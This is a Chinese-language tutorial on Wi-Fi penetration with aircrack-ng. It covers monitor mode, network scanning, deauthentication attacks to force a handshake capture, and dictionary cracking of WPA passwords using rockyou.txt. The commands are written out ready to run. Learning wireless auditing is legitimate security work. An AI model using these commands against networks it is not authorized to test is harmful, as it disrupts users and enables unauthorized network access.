无线热点攻击
AIRCRACK
简介
无线渗透和审计神器
包含各种功能的工具套件
网络检测
嗅探抓包
包注入
密码破解
基础操作
检查可能的干扰项及消灭干扰项
airmon-ng check
airmon-ng check kill
airmon-ng check
如果还有干扰项可以如
service network-manager stop
启动监听模式
airmon-ng start wlan0 1 # 指定监听信道1
iwconfig # 检查是否进入监听模式
airmon-ng stop wlan0mon # 关闭监听模式
检查网卡支持的信道
iwlist wlan0mon channel
无线抓包(airodump-ng)
抓取所有信道
airodump-ng wlan0
指定并写入文件
airodump-ng wlan0 -c 1 --bssid ::: -w file.cap
指定并仅抓取特定包
airodump-ng wlan0mon -c 1 --bssid :::: --ivs -w file.cap
数据说明
BSSID: AP的MAC地址
PWR: 网卡接收到的信号强度,距离越近信号越强(-1: 驱动不支持信号强度、STA距离超出信号接受范围)
RXQ: 最近10秒成功接收的数据帧的百分比(数据帧、管理帧),只有固定信道时才会出现
Beacons: 接收到此AP发送的beacon帧数量
#Data: 抓到的数据帧数量(WEP表示IV数量),包含广播数据帧
#/s: 最近10秒内,每秒平均抓到的帧的数量
CH: 信道好(从beacon帧中获得),信道重叠时可能发现其他信道
MB: AP支持的最大速率
ENC: 采用的无线安全技术WEP、WPA、WPA2、OPEN
CIPHER: 采用的加密套件CCMP、TKIP、WEP40、WEP104
AUTH: 身份验证方法MGT、PSK、SKA、OPEN
ESSID: 无线网络名称,隐藏AP此值可能为空,airodump从probe和association request帧中发现隐藏AP
STATION: STA的MAC地址
Lost: 通过sequence umber判断最近10秒STA发送丢失的数据包数量(管理帧、数据帧)
信号干扰、距离
发包不能收,收包不能发
Frames: STA发送的数据包数量
Probe: STA探测的ESSID
airodump-ng -c 6 --bssid ::: -w wireless wlan0mon
# -c 指定信道,上面已经标记目标热点的信道(CH)
# -bssid 指定目标路由器的BSSID,就是上面标记的BSSID
# -w 指定抓取的数据包保存的目录
aircrack-ng -a2 -b ::: -w pass.txt wireless-01.cap
WIFI攻击流程
监听
1、在命令行输入此命令airmon-ng check kill,清除有可能影响监听的进程
2、开启网卡监听airmon-ng start wlan0
3、查看是否监听成功iwconfig,成功后wlan0将会变为wlan0或者model变为监听模式
探测附近WiFi
输入命令airodump-ng wlan0,看三个参数:
BSSID:路由器的MAC地址
PWR:信号值,绝对值越低,说明信号越强
CH:当前路由器使用的信道
寻找一个WiFi进行监听,这里我们选择自己的WiFi进行监听
airodump-ng --bssid ::: -c 8 -w test wlan0
参数说明:
–bssid:路由器的MAC地址
-c:路由器使用的信道
-w:抓取的握手包名称,可以选择输出的路径,这里使用默认输出路径为根目录
另外再打开一个终端,对当前正在连接的某个设备进行攻击,使其断开与路由器的连接。(原理大概是向目标发送大量数据,或者类似于ARP欺骗的攻击,使设备与路由器断开连接,停止攻击后,设备会自动连接上路由器,此时就可以抓取到握手包)
aireplay-ng -0 10 -a **** -c **** wlan0
参数说明:
-0、–deauth:指定对目标进行攻击的次数
-a:路由器的MAC地址
-c:目标MAC地址
重启网络服务:systemctl enable --now NetworkManager
爆破
在终端输入命令: aircrack-ng -w /root/boom.txt test-01.cap 参数说明: -w:指定爆破用的字典 ret-01.cap:是我们指定的抓到的包存放的文件名
tip:/usr/share/wordlists/rockyou.txt,这个路径下是kali自带的爆破字典